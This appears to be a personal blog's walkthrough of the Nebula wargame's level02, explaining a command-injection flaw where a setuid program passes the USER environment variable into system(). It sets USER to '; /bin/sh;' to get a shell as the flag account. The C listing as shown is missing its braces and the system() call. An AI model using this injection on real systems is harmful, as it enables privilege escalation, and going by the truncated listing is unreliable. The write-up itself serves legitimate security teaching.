Jason Turley's Website

Nebula Level02 Write Up

Nebula is a wargame from Exploit Exercises about exploiting privilege escalation vulnerabilities on Linux.

This is my write up for the third level.


There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.

This level provides the source code:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char \*\*argv, char \*\*envp)
  char \*buffer;

  gid\_t gid;
  uid\_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\\"%s\\")\\n", buffer);


Below is the output from running the program normally:

level02@nebula:~$ cd /home/flag02
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo level02 is cool")
level02 is cool

In order to exploit this program, we need to exploit the vulnerability in the call to asprintf and getenv.


Here, asprintf allocates and fills a buffer with whatever the USER environment variable is set to.

(side note: the allocated buffer is never free'd, resulting in a memory leak. This has no effect on the exploit, however).

Since the USER environment variable is not checked before calling system, we can change it to something else.

For example:

level02@nebula:/home/flag02$ export USER="bobby hill"
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo bobby hill is cool")
bobby hill is cool

Knowing this, we can use a semicolon to end the /bin/echo command and run another command instead:

level02@nebula:/home/flag02$ export USER="; /bin/sh;"
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo ; /bin/sh; is cool")

sh-4.2$ whoami
sh-4.2$ getflag
You have successfully executed getflag on a target account